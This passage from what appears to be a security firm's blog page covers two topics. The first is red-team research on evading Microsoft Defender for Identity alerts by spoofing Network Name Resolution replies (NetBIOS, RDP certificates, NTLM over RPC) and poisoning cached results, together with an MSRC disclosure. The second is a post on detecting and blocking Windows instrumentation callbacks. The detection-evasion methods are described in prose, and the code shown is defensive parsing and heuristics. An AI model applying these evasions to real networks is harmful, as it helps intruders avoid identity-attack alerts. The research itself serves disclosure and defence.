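Because Npcap works below the Windows firewall, such rules are expected to stop only the OS from answering, not a Scapy-based responder from seeing the requests.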

Cached NNR responses by Defender for Identity

Another thing to consider when attempting to evade NNR-based detection is the caching of NNR responses. DfI agents in sensor version 2.2 frequently ask domain-joined devices for their hostnames with the described NNR requests and cache this information, regardless of whether suspicious traffic was received from the devices. If the DfI agent holds recently cached NNR information about a machine and a suspected attack from this machine happens, the cached information can be used instead of asking the machine directly. This is a problem when trying to evade an alert that uses NNR: if the DfI agent collected the hostname of the machine right before the attack is performed, the attacker machine may not be asked for its hostname, which makes spoofing the responses impossible, and the evasion would fail. Therefore, the script for spoofing the NNR responses must already be running on the machine, and the attacker must wait until the DfI agent asks for NNR information on its own. Spoofed responses are then sent, effectively poisoning the DfI cache with spoofed information. Now the attack with the respective NNR detection logic can be performed, and two scenarios can happen: either the DfI agent uses the spoofed, cached information, or the attacker machine is asked for its NNR information and spoofed responses can be sent. Both result in successfully evading the alert.

Indicators of Defender for Identity 2.2 usage in the environment

With control over a domain-joined machine, an attempt can be made to fingerprint DfI in version 2.2. As described above, DfI frequently queries domain-joined devices in the domain for their hostnames using NNR requests. With the access required to sniff the network interface on a compromised host, one can look for the three primary methods of NNR: NetBIOS node status request, RDP and NTLM over RPC, originating from a Windows server that could run DfI. Specific characteristics of the RDP and NTLM over RPC messages, which help to identify DfI 2.2, are described in the section “Reviewing the remaining NNR methods”. How certain one can be that a Windows server is running DfI version 2.2 depends on the number of related ports that are open on the attacker machine and on the network. The three NNR requests are sent together as a bundle. If all three ports are open, all three messages arrive together, which makes it highly likely that they come from DfI. If two ports are closed and just UDP port 137 is open, a single NetBIOS node status request is not enough to say with high certainty that the request comes from DfI.
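The “bundle” heuristic can be sketched as a small Python function over already captured connection attempts. This is an assumption-laden illustration: the two-second window, the function name `likely_nnr_sources` and the sample IP addresses are hypothetical, and the input is assumed to be a list of `(timestamp, source IP, protocol, destination port)` tuples extracted from a capture.

```python
from collections import defaultdict

# The three primary NNR probes named in this post.
NNR_PROBES = {("udp", 137), ("tcp", 3389), ("tcp", 135)}


def likely_nnr_sources(events, window=2.0):
    """Return sources that sent all three NNR probes within `window` seconds.

    events: iterable of (timestamp, src_ip, proto, dst_port) tuples.
    The window size is an assumption, not a measured DfI value.
    """
    by_src = defaultdict(list)
    for ts, src, proto, port in events:
        key = (proto.lower(), port)
        if key in NNR_PROBES:
            by_src[src].append((ts, key))

    hits = set()
    for src, probes in by_src.items():
        probes.sort()
        for i, (start, _key) in enumerate(probes):
            # Collect the distinct probe types seen within the window.
            seen = {key for ts, key in probes[i:] if ts - start <= window}
            if seen == NNR_PROBES:
                hits.add(src)
                break
    return sorted(hits)


# Hypothetical sample: one host sends the full bundle, another only NetBIOS.
sample = [
    (0.0, "172.16.94.1", "udp", 137),
    (0.1, "172.16.94.1", "tcp", 3389),
    (0.2, "172.16.94.1", "tcp", 135),
    (5.0, "172.16.94.50", "udp", 137),
]
print(likely_nnr_sources(sample))
```

A source that only ever shows up with a single probe type is deliberately not reported, which mirrors the lower certainty described above when just UDP port 137 is reachable.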

ADCS-ESC8

DfI also comes with an alert for the ADCS-ESC8 attack. To detect this attack, DfI must be installed on the related CA.

Attack overview

This attack technique targets the Active Directory Certificate Services (AD CS). It allows an attacker who is capable of performing an NTLM relay attack with a machine account to obtain a certificate that is valid for Kerberos authentication in the name of the impersonated machine account. Additionally, some requirements must be met to make the CA’s web enrolment endpoint vulnerable to this attack. For further information, see the white paper from SpecterOps: Certified Pre-Owned: Abusing Active Directory Certificate Services.

This time, the actor is on kali.jsc.lab (172.16.94.13) performing the attack. The attack scenario looks like this:

Figure 21: ADCS-ESC8 simplified overview

Note that the ESC8 attack consists of using an authentication-coercion attack and NTLM relay, which is only represented in a simplified way in this image. What happens effectively is the following:

  • The Kali machine forces the DC01 machine account to authenticate at the Kali machine using NTLM (1)
  • In step (2) and (3), Kali performs the authentication via NTLM as DC01 against the CA
  • In step (4), the attacker obtains a certificate in the name of DC01, which allows for later Kerberos authentication

Evading ESC8 using NNR

The detection logic for the alert also depends on the NNR feature. This time, the DfI agent installed on the CA02 is responsible for performing the detection. The question to be answered is whether the requestor of the certificate for DC01 is indeed DC01. The issuing of the certificate for DC01$ happened between the Kali machine and the CA. Therefore, DfI will investigate if the IP address 172.16.94.13 belongs to DC01, using NNR.

Assuming no evasion technique is used and the Kali machine responds to the NNR requests, the flow would look as follows:

Figure 22: NNR flow after ESC8

Using the previously described evasion technique for NNR, the ESC8 alert “Suspicious Domain Controller certificate request (ESC8)” can be evaded by pretending to be the machine account in whose context the certificate was requested. In this example, that machine account is DC01. While using the ESC8 attack, the detection capabilities for different coercion attacks and NTLM relay must be considered, too.

Comparing NNR usage for ESC8 to NTLM-relayed shadow credentials

An interesting inconsistency in DfI’s usage of the NNR feature can be observed when comparing ESC8 with relayed shadow credentials. In the shadow credentials section, in the part “Computer to computer”, it was said that shadow credentials can be set for machine accounts without triggering an alert when this is done over an NTLM-relayed connection. The question arising in the shadow-credentials scenario is the same as in the ESC8 scenario: “Is the request performed by the actual machine associated with the machine account, or by a different machine that successfully authenticated as that machine account via NTLM?” But for relayed shadow credentials, no NNR requests are sent to the machine from which the traffic for setting the shadow credential originated.

DCSync

Attack overview

A DCSync attack refers to an attacker who controls an entity holding the high privileges required to replicate parts of the domain. With access to such an entity, which could be a domain controller machine account, a highly privileged service account with replication rights or a domain administrator, an attacker can obtain sensitive data. For example, the attacker could obtain the AES key of the krbtgt user, which is used to encrypt and sign TGTs inside the domain, and use it to create golden tickets and establish persistence.

The alert for DCSync is also vulnerable to spoofed NNR responses since its detection logic builds on NNR. But for the evasion possibilities, a distinction must be made based on the identity that performs the DCSync. While domain controllers always have the replication rights, user and service accounts can also be granted them.

Evading DCSync alert using domain controller machine account

When performing DCSync attacks using the identity of a domain controller machine account, the detection is the same as for the alert “Suspected suspicious Kerberos ticket request” and the ESC8 alert, and the evasion works in the same way, too. If the attacker has obtained a TGT for DC02, the DCSync attack can be performed against DC01, answering the incoming NNR requests, pretending to be DC02 and vice versa.

Considerations for evading DCSync alert using service and user accounts

While detection and evasion of DCSync attacks using a domain controller machine account are reliable, they cannot be conclusively tested for service and user accounts, as the detection by DfI is unreliable for those types of accounts.

There is, however, a theory about one detection criterion that is used for these accounts. When a DCSync alert is successfully triggered using a self-created, non-default service or user account, the alert appears in the portal with the following information: “PC02 is not a recognized domain controller” (see figure 23). The attacks in the tests were performed from PC02 against DC01 with the identities of a self-created service account and a user account holding the replication rights. Since NNR requests are also made to machines from which DCSync attacks originate when service or user accounts are used, it can be suspected that a DCSync originating from any domain controller is considered legitimate. Unfortunately, the detection of DCSync attacks with these accounts is unreliable, making it hard to tell whether an evasion was successful.

Figure 23: DCSync alert with service account

Reviewing the remaining NNR methods

The focus in this blogpost is on the NNR method using NetBIOS. However, if UDP port 137 is not configured to be open on the network, NetBIOS cannot be used to evade the respective alerts, since the NetBIOS node request will never be received by the attacker and therefore, cannot be answered with a spoofed response. Consequently, the other two methods must also be inspected.

Remote desktop protocol (RDP)

Another primary method is the usage of RDP. According to documentation, “RDP (TCP port 3389) – only the first packet of Client hello” is used to perform the name resolution. No RDP connection is established; the DfI agent initiates a TLS handshake based on port 3389, acting as a client to the suspected attacker machine and sending the “Client Hello” message. If the machine is configured to listen on TCP port 3389, it will respond with the “Server Hello” message. Part of that message is the machine’s RDP certificate with extended key usage for server authentication, allowing to authenticate against the client. The RDP certificate used for this purpose can be found at the local machine’s certificate store at “cert:\LocalMachine\Remote Desktop”. By default, this is an auto-generated self-signed certificate, using the FQDN of the machine as subject and issuer. To get information related to the domain- and hostname from one machine in order to compare it with the information provided in the discussed attacks like pass-the-cert for domain controller, ESC8 or DCSync, the same technique is used as it was done with NetBIOS. This time, DNS-related information is obtained, using that NNR technique. In this case, the subject of the provided certificate is used to resolve the IP address from a potential attacker’s machine to domain and hostnames.

DfI accepts the certificate to gain the FQDN of the machine even if it is self-signed, which provides the possibility to answer to the NNR request with a spoofed, self-signed certificate. This request could also be relayed to the desired target by the attacker but requires having the RDP port open.  

In the following image the flow can be seen using a spoofed certificate indicating that PC02’s (172.16.94.11) FQDN is DC02.jsc.lab:

Figure 24: Connection to port 3389 on PC02 by DfI
Figure 25: Spoofed certificate in RDP NNR method

NTLM over RPC

The last primary method uses the endpoint mapper on TCP port 135. When a client needs to call a Windows service, for example WMI, it first contacts the endpoint mapper on port 135 to discover on which dynamic port the requested service is actually listening. The mapper then returns that high port, and the client connects to it to complete the RPC exchange. In the case of DfI, a bind request is sent to the suspected malicious machine asking to bind on the RPC interface to the name service provider interface (NSPI) while using the NTLM security provider to authenticate. The response sent from the suspected machine contains the information relevant to DfI, while information related to the RPC interface and the binds is irrelevant since DfI cares only about the information required to resolve host and domain names. This information is included in the part where the NTLM negotiation happens. Besides the NTLM server challenge, the machine gives information about its NetBIOS and DNS names to DfI. At this point, no authentication has happened between DfI and the machine, and no tamper protection is included in these messages. This also allows the manipulation and spoofing of these messages to evade NNR detection. The two messages exchanged can be seen below:

Figure 26: NTLM over RPC NNR method
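The NetBIOS and DNS names mentioned above travel in the target information of the NTLM challenge as a list of AV pairs (ID, length, UTF-16LE value), as specified in MS-NLMP. The following Python sketch parses such a list. It is a minimal illustration under assumptions: it works on the target information blob only, not on a full challenge message, and the helper names and the sample values are hypothetical.

```python
import struct

# AV pair IDs from MS-NLMP that carry host and domain names.
AV_NAMES = {
    1: "nb_computer",   # MsvAvNbComputerName
    2: "nb_domain",     # MsvAvNbDomainName
    3: "dns_computer",  # MsvAvDnsComputerName
    4: "dns_domain",    # MsvAvDnsDomainName
}
AV_EOL = 0  # MsvAvEOL terminates the list


def parse_av_pairs(blob: bytes) -> dict:
    """Extract the name-related AV pairs from an NTLM target information blob."""
    names = {}
    offset = 0
    while offset + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, offset)
        offset += 4
        if av_id == AV_EOL:
            break
        value = blob[offset:offset + av_len]
        offset += av_len
        if av_id in AV_NAMES:
            names[AV_NAMES[av_id]] = value.decode("utf-16-le")
    return names


def build_av_pairs(pairs) -> bytes:
    """Helper for the example only: encode (id, text) pairs and append MsvAvEOL."""
    blob = b""
    for av_id, text in pairs:
        raw = text.encode("utf-16-le")
        blob += struct.pack("<HH", av_id, len(raw)) + raw
    return blob + struct.pack("<HH", AV_EOL, 0)


# Hypothetical values matching the lab naming used in this post.
sample = build_av_pairs([(2, "JSC"), (1, "PC02"), (4, "jsc.lab"), (3, "PC02.jsc.lab")])
print(parse_av_pairs(sample))
```

Since none of these fields is authenticated at this stage of the exchange, whatever values the responding machine places here are what a parser like this returns.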

Secondary method: DNS lookup

When the primary methods (NetBIOS, RDP, NTLM over RPC) fail, a DNS lookup is used. This is the case if there is no response from any of the primary methods or if there’s a conflict in the responses received from two or more primary methods. Inspecting the DfI agent using Procmon, the described behavior is as follows:

Figure 27: Secondary method: DNS lookup

In the upper highlighted area, the three primary methods can be seen, while no connection to “PC02” could be established using these protocols and no NNR response will be received. The second area shows that two DNS requests are made by the DfI agent. The exact request made can be seen in Wireshark, when monitoring the loopback interface on DC01:

Figure 28: DNS lookup by DfI agent

The first request is a reverse DNS lookup, using the IP address from which the suspected attack originated to receive the hostname of the machine. The second request is a forward DNS lookup using the received hostname, serving as a secondary verification step to check whether the initial IP address is returned again.
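The reverse-then-forward check can be sketched with Python’s standard `socket` module. This is a simplified model, not DfI’s implementation: the function names are hypothetical, and treating a mismatch as “no name resolved” is an assumption made for the example. The resolver functions are passed in as parameters so the logic can be tried without a live DNS server.

```python
import socket


def reverse_lookup(ip: str) -> str:
    """Reverse DNS lookup (PTR): IP address to hostname."""
    return socket.gethostbyaddr(ip)[0]


def forward_lookup(hostname: str) -> list:
    """Forward DNS lookup: hostname to list of IPv4 addresses."""
    return socket.gethostbyname_ex(hostname)[2]


def resolve_with_verification(ip, reverse=reverse_lookup, forward=forward_lookup):
    """Return the hostname only if the forward lookup leads back to the same IP."""
    try:
        hostname = reverse(ip)
        addresses = forward(hostname)
    except OSError:  # socket.herror and socket.gaierror are subclasses of OSError
        return None
    return hostname if ip in addresses else None


# Usage with stand-in resolvers (hypothetical records for the lab in this post).
ptr_records = {"172.16.94.11": "PC02.jsc.lab"}
a_records = {"PC02.jsc.lab": ["172.16.94.11"]}
print(resolve_with_verification("172.16.94.11", ptr_records.__getitem__, a_records.__getitem__))
```

Unlike the primary methods, both answers in this flow come from the DNS server rather than from the suspected machine itself.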

Reviewing the impact of NNR vulnerability

It was discussed how the flaw in NNR could be exploited, leading to an evasion of alerts that rely on NNR. The impact of that vulnerability can also be rated by the number of alerts that are affected by it. Microsoft writes: “NNR data is crucial for detecting the following threats:”

  • Suspected identity theft (pass the ticket)
  • Suspected DCSync attack (replication of directory services)
  • Network-mapping reconnaissance (DNS)

This means that at least three alerts depend on NNR to be triggered. While the DCSync alert appears here, there are two additional alerts not shown in this list that rely on NNR, as previously discussed. These two are the ADCS-ESC8 alert “Suspicious Domain Controller certificate request (ESC8)” and the pass-the-cert alert for domain controller machine accounts, “Suspected suspicious Kerberos ticket request”. This makes at least five alerts in total, and there may be more alerts using NNR as a detection technique.

It should be noted that NNR works in this way only in DfI version 2.X. DfI in version 3.0 uses NNR but does not include the attacker machine in its detection logic. For the name resolution, the Defender device inventory is used, which is outside of the attacker’s control. The device inventory is a centralized overview of all discovered devices in the organization. The device information is collected through several of Microsoft’s security products, such as DfI and Defender for Endpoint.

Defender for Identity deployment overview

Furthermore, it can be inspected which Windows server can run DfI sensors in version 3.0 and which remains at version 2.2 to get a better idea of the risk posed by NNR.

Figure 29: DfI sensor deployment overview (https://learn.microsoft.com/en-us/defender-for-identity/deploy/deploy-defender-identity)

First, only domain controllers can use the sensor in version 3.0. The CA, Federation server and Entra Connect server remain on sensor version 2.2. This means that alerts which are generated by DfI agents running on these servers and which depend on NNR can be evaded.

For domain controllers the usage of version 3.0 is only possible when running as Windows Server 2019 or higher and when Microsoft Defender for Endpoint is enabled on that Windows Server.
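The conditions stated above can be condensed into a small decision helper. This is merely a restatement of the two preceding paragraphs as code; the function name, the role strings and the use of the release year as a version number are hypothetical simplifications.

```python
def can_run_sensor_v3(role: str, windows_server_year: int, mde_enabled: bool) -> bool:
    """Return True if, per the conditions in this post, sensor version 3.0 is possible.

    role: e.g. "domain_controller", "ca", "federation", "entra_connect" (hypothetical labels).
    windows_server_year: release year of the Windows Server version, e.g. 2019.
    """
    return role == "domain_controller" and windows_server_year >= 2019 and mde_enabled


# Servers for which this returns False stay on version 2.2 and its NNR behavior.
for server in [("domain_controller", 2022, True), ("domain_controller", 2016, True), ("ca", 2022, True)]:
    print(server, can_run_sensor_v3(*server))
```

Applied to an inventory of servers, such a check gives a first impression of which sensors still rely on the NNR methods described in this post.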

Disclosure to Microsoft MSRC

A security advisory about the flaw in the core feature NNR affecting DfI version 2.2 was disclosed to Microsoft via the MSRC portal on February 22, 2026. The vulnerability was not recognized by Microsoft and was reasoned to be below the bar for immediate servicing. As far as the answer from MSRC can be interpreted, no fix will be issued.

Conclusion

While this blogpost focused on alerts that could be evaded, the conclusion focuses on what these investigations reveal. The biggest problem DfI faces is that the assumed attacker is involved in the detection logic: decisions are based on indicators that the attacker controls. This problem can be observed in the pass-the-cert alert, where DfI attempts to detect the attack through attacker-controlled indicators. It also becomes evident in the reliance on information provided by self-signed certificates under the attacker’s control, like the age of a certificate, which is used to determine whether further detection logic needs to be applied. Likewise, the NNR method using RDP relies on information from self-signed certificates and bases decisions on it.

The general problem with the NNR feature in DfI version 2.2 is that it involves the suspected attacker machine while using techniques that do not provide authentication or tamper protection, thereby giving malicious actors the possibility to evade NNR-based detection logic.

Using a trusted database, such as the Defender device inventory, to resolve raw IP addresses to hostnames is a good approach, since it cannot be interfered with by a malicious actor, but it should be available in all DfI versions, not only version 3.0.

Despite various technical issues and the fact that Microsoft does not consider these as vulnerabilities and has no plans to make any changes, security professionals can still take steps to improve security and detectability. This will be described in the second blogpost: Microsoft Defender for Identity evasions in 2026 – Part II.

References

  1. https://www.synacktiv.com/publications/a-dive-into-microsoft-defender-for-identity
  2. https://www.synacktiv.com/publications/understanding-and-evading-microsoft-defender-for-identity-pkinit-detection
  3. https://learn.microsoft.com/en-us/defender-for-identity/nnr-policy
  4. https://learn.microsoft.com/en-us/defender-xdr/pilot-deploy-overview
  5. https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
  6. https://learn.microsoft.com/en-us/defender-for-identity/deploy/deploy-defender-identity
  7. https://blog.redteam-pentesting.de/2025/windows-coercion/
  8. https://en.hackndo.com/ntlm-relay/#preliminary
Red Teaming

Microsoft Defender for Identity evasions in 2026 – Part I

June 16, 2026 – Microsoft Defender for Identity (DfI) is one of Microsoft’s key solutions for detecting identity-based attacks in Active Directory environments – but how well does it hold up against a skilled attacker? This two-part blog post dives into DfI’s detection capabilities for high-impact attacks such as shadow credentials, pass-the-cert, ESC8, and DCSync. Additionally, it uncovers a spoofing and relaying vulnerability in DfI’s Network Name Resolution component that can be used to evade multiple alerts, and offers blue team perspectives on closing these gaps.


Author: Jakob Scholz

Red Teaming

Windows Instrumentation Callbacks – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Do you want to protect your systems? Feel free to get in touch with us.

Maturity level for security assessments

May 11, 2026

Maturity level for security assessments: the right assessment at the right time

At the cirosec TrendTage, I recently gave a talk on pentesting, assumed breach, red teaming, TLPT and related formats. The graphical classification of the individual assessment types by maturity level and budget attracted particular interest. A short summary for reference:

A security assessment is only efficient if it matches the maturity level of the organization. Those who have not yet done their homework on basic hygiene waste valuable resources on a complex red teaming and cannot benefit from the added value of such a project.

Network scans, penetration tests of applications or initial-access assessments have hardly any prerequisites. The goal here is to find vulnerabilities efficiently. In an assumed-breach analysis, the focus is on identifying vulnerabilities in the internal network and in Active Directory. Detection and response capabilities do not yet play a role. As a result, such assessments can be carried out on a manageable budget, which also allows them to be repeated regularly.

As soon as detection and response capabilities are in place, purple teaming / war gaming or assumed-breach red teaming become relevant. Here, it is no longer only prevention that is tested; the interplay between attack (red team) and defense (blue team) is specifically trained.

Classic, compact and continuous red teaming requires a solid infrastructure and established incident response processes. The goal is to simulate real, long-lasting attacks. Such projects usually target the entire organization and provide insights at many different levels.

A special form of red team assessment is the threat-led penetration test (TLPT) according to TIBER. However, this format is only relevant for particularly mature companies in the financial sector. Detailed information can be found in the separate blog post on this topic.

In summary: you do not have to start with red teaming. Those who align their security assessments with their maturity level build security sustainably and within budget. Companies with an advanced maturity level, in turn, benefit from the insights gained from the holistic attacks of a red team assessment.

An overview of possible focus areas for penetration tests and red team assessments is available on our website.

Michael Brügge

Managing Consultant

Windows Instrumentation Callbacks – Part 4

February 10, 2026

Windows Instrumentation Callbacks – Detection and Countermeasures, Part 4

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

If you don’t yet know what ICs are, we strongly recommend you read the first part of this series. If you are curious about what can be done with them, we recommend also reading the second and third part.

In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Disclaimer

  • This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
  • This series is aimed at x64 programs on the Windows versions 10 and 11. Neither older Windows versions nor WoW64 processes will be discussed.

Detection

In the first blog post we reversed NtSetInformationProcess to find out that the PROCESSINFOCLASS enum value 0x28 is used to set an IC. In the kernel the member InstrumentationCallback of the corresponding KPROCESS structure then gets set to the passed callback address. This of course means that a kernel driver could simply check the KPROCESS structure of the process to check if an IC is set. Before we move on to user-mode ways of detecting ICs, let’s cover something we haven’t in any of the previous posts: unregistering ICs.

Unregistering ICs

We thought “How hard can it be? We can simply call NtSetInformationProcess with a null pointer to unset it.” Correct… sometimes… if the process uses control flow guard (CFG), your IC would still be set, as a null pointer is not a valid call target. In the first blog post we already mentioned that ntoskrnl!NtSetInformationProcess+0x1d09 is where the callback address gets set in the KPROCESS structure, so let’s go there in the decompiler. In this case we renamed the relevant stack variable that contains the callback address to “ic_addr”. As can be seen, there is a call to MmValidateUserCallTarget with that address before it gets set in KPROCESS:

If we decompile MmValidateUserCallTarget, it quickly becomes clear that this has something to do with CFG as can be seen by the call to MiIsProcessCfgEnabled because otherwise simply 1 is returned.

A null pointer is very obviously not a valid call target; however, let’s quickly prove that this function isn’t successful by using a kernel debugger and placing a breakpoint on NtSetInformationProcess+1ccc, which is where MmValidateUserCallTarget is executed. Additionally, we placed a breakpoint on NtSetInformationProcess+1d09 to show where the IC gets set in the KPROCESS struct. As can be seen, when the address for the IC is passed to MmValidateUserCallTarget, the function returns 1 and KPROCESS is updated. However, when a null pointer is passed, 0 is returned.

You can’t see if KPROCESS is updated after the last g instruction; you will just have to believe us that it wasn’t. But as can be seen in the previously shown decompilation of NtSetInformationProcess, the relevant code branch to update KPROCESS isn’t even executed, as instead ExReleaseRundownProtection is called.

This means an IC can only be entirely unregistered (be set back to 0) if a process doesn’t have CFG enabled. Otherwise, it can only be updated to a new valid call address and never be set back to the original value the InstrumentationCallback member had at the process’s start: 0. While any valid call target’s address can be used, the address should be carefully selected, as most will of course crash the program because random code would be executed. The updated callback of course still needs to do what is expected of an IC, which is to continue execution by jumping to r10. This also means that if a DLL that gets loaded into a CFG-enabled process sets an IC with the callback being in its own memory region, the process will crash once that DLL is unloaded and the DLL’s memory including the callback gets deallocated. In this case the callback would also need to be updated before the DLL is unloaded if the process shouldn’t crash.

For CFG-enabled processes it is thus not possible to hide from kernel mode drivers that an IC was set, as they can simply check if the process’s KPROCESS.InstrumentationCallback != 0. For non-CFG processes the InstrumentationCallback member can be restored to its original value.

In addition to that, enabling CFG makes ICs easier to detect on a big scale, as poorly written IC implementations will crash the process, which will be written to event logs. This is of course not great, but what’s better? Processes crashing, which indicates something weird is going on, or working processes with an attacker’s code inside?

User mode

That it is possible to detect from kernel mode whether an IC is set was obvious, as we already discussed in the first part that it’s merely a member of the process’s KPROCESS structure. Let’s discuss the way more interesting scenario: detecting from user mode if an IC is set on one’s own process. If you step through the process with a debugger, you will obviously be able to tell that an IC is registered if a syscall that is stepped over causes the code flow to magically jump to somewhere else. Let’s discuss different ways.

If an IC is set with NtSetInformationProcess, the logical way of checking if an IC is set would be to call NtQueryInformationProcess instead. However, when we disassemble/decompile NtQueryInformationProcess and search for the switch case on the second parameter, which is the PROCESSINFOCLASS, we can see that the information class used for ICs is not implemented for querying. This is shown by the following shortened decompilation:

NtQueryInformationProcess(arg1, proc_info_class, …)
[…]
+0x002b        int64_t proc_info_class_copy = (int64_t)proc_info_class;
[…]
+0x02f9            switch (proc_info_class_copy) {
[…]
+0x3bf6                case 5:
+0x3bf6                case 6:
+0x3bf6                case 8:
+0x3bf6                case 9:
+0x3bf6                case 0xb:
+0x3bf6                case 0xd:
+0x3bf6                case 0x10:
+0x3bf6                case 0x11:
+0x3bf6                case 0x19:
+0x3bf6                case 0x23:
+0x3bf6                case 0x28:
+0x3bf6                case 0x29:
+0x3bf6                case 0x30:
+0x3bf6                case 0x35:
+0x3bf6                case 0x38:
+0x3bf6                case 0x39:
+0x3bf6                case 0x3e:
+0x3bf6                case 0x3f:
+0x3bf6                case 0x44:
+0x3bf6                case 0x4e:
+0x3bf6                case 0x50:
+0x3bf6                case 0x53:
+0x3bf6                case 0x56:
+0x3bf6                case 0x5a:
+0x3bf6                case 0x5b:
+0x3bf6                case 0x5d:
+0x3bf6                case 0x5f:
+0x3bf6                {
+0x3bf6                    result = -0x3ffffffd;
+0x3bf6                    break;
+0x3bf6                }
[…]

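As you might remember, we used 0x28 for setting the IC. Its case belongs to the group shown above, whose shared result -0x3ffffffd is the NTSTATUS value 0xC0000003 (STATUS_INVALID_INFO_CLASS).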

This means, we can’t use NtQueryInformationProcess to find out if an IC is set. We don’t know of any user mode function that allows querying for the IC; that does of course not mean that it doesn’t exist. By dumping kernel memory, we could of course again read out the KPROCESS structures to check for ICs, but this would obviously require a driver or some way to execute code in the kernel memory, riiiight Microsoft? There is a way (/are ways?) of dumping kernel memory including the KPROCESS structures entirely from user mode without needing to load any drivers yourself. We won’t tell you how this is done, as we are already spoon-feeding you enough 😉 Additionally, that would be a moral gray area; we want to keep EDRs/ACs a step ahead of attackers.

rcx and r10

In the first blog post we briefly mentioned that we recommend attaching a debugger to a program with and without an IC set to check the values of registers after syscalls but didn’t dive deeper into it. I attached WinDbg to a random process and set a breakpoint on a random syscall (ntdll!NtWriteVirtualMemory+0x12). As can be seen in the following screenshot, rcx was changed to the address of the instruction after the syscall, that is the ret instruction. Also, r10 was zeroed.

Now compare this to the following screenshot, which was taken after an IC was set:

As expected, r10 contains the actual return address. The picture also shows that rcx contains the address of the start of the IC instead of the actual return address.

This means, we can detect poorly written ICs by checking rcx and r10 at the ret instruction after the syscall, that is the instruction it would normally execute if no IC was set. These registers can of course be arbitrarily changed by the IC, but that needs to be kept in mind by the author. If rcx isn’t properly set, it does not only leak that an IC is set but also where it is located in memory, which could be used to automatically dump it or for something even more interesting ‑ which we will get to.
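The two observations above can be turned into a small decision helper. The following is only a sketch: the function and enum names are ours, and capturing rcx and r10 at the ret instruction (for example with a debugger or a hand-written stub) is assumed to happen elsewhere.

```cpp
#include <cassert>
#include <cstdint>

// Possible conclusions at the `ret` that follows a `syscall` instruction.
enum class IcHint { NoneObserved, CallbackLeaked, Inconclusive };

// rcx / r10: register values captured at the `ret` after the syscall.
// ret_address: address of that `ret` instruction itself.
// Based only on the two WinDbg observations described above. A careful IC
// can restore both registers, so NoneObserved does not prove absence.
inline IcHint classify_after_syscall(std::uint64_t rcx, std::uint64_t r10,
                                     std::uint64_t ret_address) {
    if (rcx == ret_address && r10 == 0)
        return IcHint::NoneObserved;    // matches the run without an IC
    if (r10 == ret_address && rcx != ret_address)
        return IcHint::CallbackLeaked;  // rcx probably points at the IC entry
    return IcHint::Inconclusive;
}
```

If the result is CallbackLeaked, the captured rcx value is the candidate address of the IC that could be dumped or reused as described above.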

Preventing ICs from getting set

If it is hard to detect whether an IC is set or not, we could try preventing others from setting them in the first place. This is not very easy to do. Let’s assume two different starting points of an attacker: the attacker is inside the process on which he wants to set an IC or the attacker is in another process. If the attacker is already in the kernel, you got entirely different problems so we will not discuss that.

One’s own process context

In the second part of this blog series, we already discussed one way of preventing the IC from getting overwritten, which was done by hooking NtSetInformationProcess. For a simple attacker this suffices; however, the hook can be avoided through direct and indirect syscalls. Even if the syscall instruction in NtSetInformationProcess is hooked, an attacker could use the syscall instruction of another Windows API to not run into the hook. This would mess up the call stack, but to detect that, a kernel driver would be required, as the new IC is already set once the syscall has been executed and returned to user mode. Another idea is to place a page guard on the memory page of NtSetInformationProcess after registering an appropriate exception handler to detect reads of the SSN of NtSetInformationProcess or nearby syscalls; this would however take a toll on performance.

Another detection mechanism is using a heartbeat. The originally set IC could use a counter that increments on every IC execution, while some regular code that is not in the IC checks every few seconds if the counter was incremented. If the counter wasn’t incremented in a while, the IC was overwritten, as syscalls are, depending on the program, constantly made. This way the program could then try reregistering its own IC, which is not guaranteed to succeed, but the program can again detect through the counter if reregistering the IC was successful.
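A minimal sketch of such a heartbeat could look as follows. The struct and method names are ours; in a real IC the increment would be done by the assembly callback (for example with a lock-prefixed increment) instead of a C++ method.

```cpp
#include <atomic>
#include <cassert>
#include <cstdint>

// Heartbeat shared between the IC and a watchdog (all names are ours).
struct IcHeartbeat {
    std::atomic<std::uint64_t> ticks{0};  // incremented by the IC
    std::uint64_t last_seen = 0;          // only touched by the watchdog

    // Stands in for the increment the IC performs on every execution.
    void on_callback() { ticks.fetch_add(1, std::memory_order_relaxed); }

    // Called by regular code every few seconds. Returns true if at least
    // one IC execution happened since the previous check.
    bool alive_since_last_check() {
        const std::uint64_t now = ticks.load(std::memory_order_relaxed);
        const bool alive = (now != last_seen);
        last_seen = now;
        return alive;
    }
};
```

When alive_since_last_check() returns false for a program that constantly makes syscalls, the watchdog can try to reregister the IC and use the next check to see whether that worked.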

If the attacker’s IC is adjusted to the program, he could of course also increment that counter himself, or even more interesting: if the previous IC’s address was leaked through the aforementioned ways, the attacker’s IC could call the previous IC while filtering what is passed to it. This means it is not only interesting for attackers to hide that an IC is set but also for defenders, as there’s no proper way of being entirely sure that your IC is the registered one. At this point we are talking about a very sophisticated attacker, as the IC would need to be highly adapted. If the victim process does not repeatedly dump the IC address itself (very unlikely), it has no way of knowing if its own IC was overwritten, as any detection logic in that IC can be automatically executed by calling the IC from the new, actually set IC.

Other process context

As initially mentioned, setting an IC on another process requires the SeDebugPrivilege. This is a very extensive privilege. If the user does not have this privilege, there is no way for him to set an IC on another process. This means, properly hardening your environment and stripping users of unneeded privileges is also the best defense against ICs being set on other processes.

Let’s assume the user has the SeDebugPrivilege. In that case the victim process can’t do much against an IC being set other than repeatedly scanning for open handles and closing those with the PROCESS_SET_INFORMATION access mask. This contains a race condition, as with the correct timing an IC can still be set. Of course, once the IC is set the same detection mechanisms mentioned in “One’s own process context” apply again.

Closing words

This marks the end of this blog series. Congratulations if you read through all of it! If you got questions or built upon this research (as there’s still a lot to discover with ICs), feel free to reach out.

Windows Instrumentation Callbacks – Part 3

January 28, 2026

Windows Instrumentation Callbacks – Injections, Part 3

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

If you have not yet read the first and second part of this series, we strongly recommend you read them to find out what ICs are and how to set them.

In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

